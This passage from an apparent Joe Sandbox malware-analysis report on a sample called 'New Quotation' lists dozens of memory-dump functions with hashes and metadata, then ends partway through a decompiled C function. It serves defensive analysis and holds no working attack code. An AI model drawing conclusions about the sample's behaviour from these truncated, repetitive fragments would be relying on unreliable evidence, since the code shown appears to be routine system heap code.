                                                                                                                                                                                          • Opcode Fuzzy Hash: 64fd89f31b4db866ea7016d5108ffe1ddd7e17252f470f83893497f54b3192f8
                                                                                                                                                                                          • Instruction Fuzzy Hash: B4900231252001429D4062595904B4E411547E1302FD2D819F0005514CC92C88A5A223
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9918f6f0c86b0043c212499109eca993abd47cc1c503a7f903ee06feda5cc29e
                                                                                                                                                                                          • Instruction ID: d9f13ed759d6c480df3c3e79c3ff8f9d9ce73e04018799d3a06e316ada3bdca6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9918f6f0c86b0043c212499109eca993abd47cc1c503a7f903ee06feda5cc29e
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC90022129100802D9407159851470B001687D0601FD2C415F0014514DC62E89A9B6B3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812F30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 371498332f47e9e63456d50a0298602a6d3624797130292759c9e9da6debf696
                                                                                                                                                                                          • Instruction ID: 834fd22492a09d23f37849bd0b43682114281913820e3d7a7be482eb8f16408d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 371498332f47e9e63456d50a0298602a6d3624797130292759c9e9da6debf696
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0290022125144442D94062594904B0F411547E1202FD2C41DF4146514CC92D8899A723
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 469c7931025f1d8672ff6c631c56ac153c6e9a5b82f3896d6b70841ed328ee1f
                                                                                                                                                                                          • Instruction ID: 66f5b2830e4f54d3e8c5ed2d794294118b3a26714b39a968876fcced5703555c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 469c7931025f1d8672ff6c631c56ac153c6e9a5b82f3896d6b70841ed328ee1f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9390026126100042D9046159450470A005547E1201FD2C416F2144514CC53D8CA5A127
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812EC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a19117e946759aaa1c6a2f0160d326fd0821e4fe29668d6d02b3d2325c342ce3
                                                                                                                                                                                          • Instruction ID: 0c115c76b7e514982a7e53b634c60c8333e3208a83b65d0142b270e8044e0888
                                                                                                                                                                                          • Opcode Fuzzy Hash: a19117e946759aaa1c6a2f0160d326fd0821e4fe29668d6d02b3d2325c342ce3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A90023125140402D9006159490874B001547D0302FD2C415F5154515EC67DC8D5B533
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812E00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 54323e6a1730dec722c5e15af8327f50f9b779303206a5875604cc8b8096a77b
                                                                                                                                                                                          • Instruction ID: c817c94b58102258dcce85aeeadcfff9b9af0d7226eabdaf3ac3301f793c2d69
                                                                                                                                                                                          • Opcode Fuzzy Hash: 54323e6a1730dec722c5e15af8327f50f9b779303206a5875604cc8b8096a77b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8790026125140403D9406559490470B001547D0302FD2C415F2054515ECA3D8C95B137
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8129D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 45ca4fbf5f72a416da1b877806c9f0f09ff610a185836af671b81eaf59a34c46
                                                                                                                                                                                          • Instruction ID: 59246a35c815b9be382e946666d275ce8d7f32f3667b7c5c36db9c934d4eac09
                                                                                                                                                                                          • Opcode Fuzzy Hash: 45ca4fbf5f72a416da1b877806c9f0f09ff610a185836af671b81eaf59a34c46
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E9002A1251140924D00A2598504B0E451547E0201FD2C41AF1044520CC53D8895E137
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8138D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 65339b87c4a683399316b635d94ef9bf386909f437e711b35ce1dc1b8f20c5ca
                                                                                                                                                                                          • Instruction ID: 9d8ead35b18ba1b112f2e95ffae133c501d3f7d81b7d7b779e0e1832563cbfe3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 65339b87c4a683399316b635d94ef9bf386909f437e711b35ce1dc1b8f20c5ca
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3290022129505102D950715D450471A401567E0201FD2C425F0804554DC56D8899B223
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0f85db54df007471380d9abc51ee46a3fcbd21f090313ce31d8106f3e43b29cf
                                                                                                                                                                                          • Instruction ID: f5c43d1e5de70172448e0a851344331666ae912fcffe874548d9a4dc78034fef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f85db54df007471380d9abc51ee46a3fcbd21f090313ce31d8106f3e43b29cf
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE90023125100842D90061594504B4A001547E0301FD2C41AF0114614DC62DC895B523
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 8cd3040746af4b8e0bef440d01346a81798e80cca98e75a7f99daa15412d4a67
                                                                                                                                                                                          • Instruction ID: a61c3b79c273ba2f14032831dd332da41a3fdf78574ac27e79b8b0fa5a55236e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cd3040746af4b8e0bef440d01346a81798e80cca98e75a7f99daa15412d4a67
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C90022165500402D9407159551870A002547D0201FD2D415F0014514DC66D8A99B6A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812B00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 2d9eec150980b8fc0c14ddab4363b1d21f1ce5fc5489ea3e0499b30c74962216
                                                                                                                                                                                          • Instruction ID: 40e9210ce3f1c39a60b294629823c6a33a3a1ffb0ccf6b73135776fd5d002bcf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d9eec150980b8fc0c14ddab4363b1d21f1ce5fc5489ea3e0499b30c74962216
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F90023125504842D94071594504B4A002547D0305FD2C415F0054654DD63D8D99F663
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812A80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 1d7080959156053969b83dd99a6358805a206bcade57888f7e488c8cb098529d
                                                                                                                                                                                          • Instruction ID: b402902102c73f540f57af8d8f16aecd40df5db1ff7d2709612e66a9ba4b7b90
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d7080959156053969b83dd99a6358805a206bcade57888f7e488c8cb098529d
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA9002612520000349057159451471A401A47E0201FD2C425F1004550DC53D88D5B127
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812AA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: b7f70b0989b7404fe4b2c36fd087a4807e1264a6b87b4920c4cb1a68d54c6db2
                                                                                                                                                                                          • Instruction ID: 0d79a32ff4969d70b323a8d9522bbc362f401bd4a09f9e08af65b5e0a722b9d6
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7f70b0989b7404fe4b2c36fd087a4807e1264a6b87b4920c4cb1a68d54c6db2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0990023125100802D9046159490478A001547D0301FD2C415F6014615ED67D88D5B133
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812AC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 0fb7054797dcb878aa8e28256b13c0a4239b112dd55bebe2a32412c6287f4192
                                                                                                                                                                                          • Instruction ID: f2c059799c875f68c20b659ddeaf69a177add5f11a68d7a9c8b0af4fbd5fe235
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0fb7054797dcb878aa8e28256b13c0a4239b112dd55bebe2a32412c6287f4192
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0890023165500802D9507159451474A001547D0301FD2C415F0014614DC76D8A99B6A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 983674ceee975fe0701914cd5b49c3f489340349c6b1dfefa9eb15c6c70252d7
                                                                                                                                                                                          • Instruction ID: e9da2032e3a87c7a54b2826b16613a5b31280ab73e87da5ea2c450ac06c8709e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 983674ceee975fe0701914cd5b49c3f489340349c6b1dfefa9eb15c6c70252d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E900225271000020945A559070460F045557D63517D2C419F1406550CC63988A9A323
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D814570 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: ca3e1e64ef8a899b40ef0977c2ff0ad73bc2fe2f71afbf75d03b8457cc88e2db
                                                                                                                                                                                          • Instruction ID: 460558412fa4042241c8e0102c3e89d3e9c00c377fdc007cdc05702cd885abf8
                                                                                                                                                                                          • Opcode Fuzzy Hash: ca3e1e64ef8a899b40ef0977c2ff0ad73bc2fe2f71afbf75d03b8457cc88e2db
                                                                                                                                                                                          • Instruction Fuzzy Hash: B19002616511004249407159490450A601557E13017D2C519F0544520CC62C8899E26B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8134E0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 9ab3a64d5ae22d0eda698eb10abd225b7206a3864ab4d4fcdf446a765ebfafb1
                                                                                                                                                                                          • Instruction ID: da80aa456d8b0b121a77f402bee8084b5e341430277de6408b69942c30f0e47b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab3a64d5ae22d0eda698eb10abd225b7206a3864ab4d4fcdf446a765ebfafb1
                                                                                                                                                                                          • Instruction Fuzzy Hash: D890023165510402D9006159461470A101547D0201FE2C815F0414528DC7AD8995B5A3
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D814260 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a3b5d78c23501b46fc773d2a9a14152558a6716abd47b4ca6fb989caabfd3b34
                                                                                                                                                                                          • Instruction ID: 78a3d62c509af0442d9fafcb94b513cd050dbe5fad2fbf12718c3802027079ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: a3b5d78c23501b46fc773d2a9a14152558a6716abd47b4ca6fb989caabfd3b34
                                                                                                                                                                                          • Instruction Fuzzy Hash: 729002316554001299407159498464A401557E0301FD2C415F0414514CCA2C899AA363
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D812B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                          • Instruction ID: c0b8b2ee10acdc704085650e5a415b6ed0032a2deeeff89e276c971641d84924
                                                                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8AA1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: HEAP:
                                                                                                                                                                                          • API String ID: 3446177414-2466845122
                                                                                                                                                                                          • Opcode ID: 8eba1d52e9c7a9c61882dd0e6a22134659b24c0b2832fb5b0220bf620f766b2a
                                                                                                                                                                                          • Instruction ID: 8e911c398b10e21cf0a88194a4cf3d883d50ca29c6b8b253dee8615159ac3d72
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8eba1d52e9c7a9c61882dd0e6a22134659b24c0b2832fb5b0220bf620f766b2a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 69A17871A083128FC705CF28C894A2BB7E5BF88A50F05456EFA46DB720E770EC45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D807550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                          			E1D807550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x1d8cb370 ^ _t107;
				_v8 =  *0x1d8cb370 ^ _t107;
				_t105 = __ecx;
				if( *0x1d8c6664 == 0) {
					L5:
